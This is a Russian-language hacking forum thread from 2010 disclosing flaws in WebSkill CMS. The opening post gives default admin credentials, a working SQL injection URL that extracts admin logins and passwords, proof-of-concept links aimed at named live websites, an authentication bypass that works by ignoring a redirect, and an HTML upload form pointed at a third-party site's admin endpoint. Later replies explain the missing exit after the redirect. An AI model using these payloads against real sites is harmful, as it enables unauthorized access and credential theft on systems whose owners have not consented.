Старый 10.09.2010, 14:45   #1
Atra Pluvia
 
Регистрация: 07.07.2010
Сообщений: 21
Репутация: 53
По умолчанию WebSkill CMS

WebSkill CMS
http://www.webskill.org/
Сайты можно найти в портфолио.

Логин:пароль по дефолту(даже на официальном сайте такие же)
Код:
r00t_xvost:123
SQL-injection(mq==off):

Эксплуатация:
/index.php?page&id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,log in,password),10,11,12,13,14+from+wscms_admins-- s

PoC:
http://tal.dn.ua/index.php?page&id=-1'+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14-- s
http://www.webskill.org/index.php?page&id=-1'+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14-- s

Auth bypass(-):

Уязвимый файл:
/admin/admheader.php

Код:
PHP код:
  if (!isset($_SESSION["AID"]) or $_SESSION["AID"]<=0)
  {
       
header('Location: login.php');
  } 
Отключаем в браузере перенаправление, заходим в админку, и работаем. =(

File upload(-):
Льётся по адресу
/admin/load.php?module=banners&createimage&save&banid=0

$_FILES['file']

Сохраняется в /uploads/images/banners/filename

Формочка и PoC:
Код:
<html>
<form method="POST" action="http://stroycentr.dn.ua/admin/load.php?module=banners&createimage&save&banid=0" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>

Последний раз редактировалось Atra Pluvia; 10.09.2010 в 18:36..
Atra Pluvia вне форума   Ответить с цитированием
Старый 10.09.2010, 15:32   #2
Kernet
 
Регистрация: 06.07.2010
Сообщений: 16
Репутация: 0
По умолчанию

[offtop]
Сначала прочитал WebKill CMS, потерял один глаз...
[/offtop]
Kernet вне форума   Ответить с цитированием
Старый 10.09.2010, 17:41   #3
Dr.TRO
 
Аватар для Dr.TRO
 
Регистрация: 06.07.2010
Сообщений: 90
Репутация: 21
По умолчанию

прошу прощения но если считать код указанный /admin/admheader.php, в смысле
PHP код:
  if (!isset($_SESSION["AID"]) or $_SESSION["AID"]<=0)
  {
       
header('Location: login.php');
  } 
уязвим, то все скрипты мира уязвимы... или я чего-то не понимаю?
__________________
http://fc01.deviantart.net/fs48/f/20...eyecixramd.png
http://img156.imageshack.us/img156/2...userbartd7.png
Цитата:
root@rdot.org ~ # perl -MAcme::BadExample
Dr.TRO вне форума   Ответить с цитированием
Старый 10.09.2010, 18:18   #4
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от Dr.TRO Посмотреть сообщение
прошу прощения но если считать код указанный /admin/admheader.php, в смысле
PHP код:
  if (!isset($_SESSION["AID"]) or $_SESSION["AID"]<=0)
  {
       
header('Location: login.php');
  } 
уязвим, то все скрипты мира уязвимы... или я чего-то не понимаю?
header('Location: login.php'); выполнается он, а зетм и весь остальной скрипт (читай админка).
После локейшона по правильному должна стоять заглушка (die,exit).
Отключаем в браузере перенаправление, заходим в админку, и работаем.
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot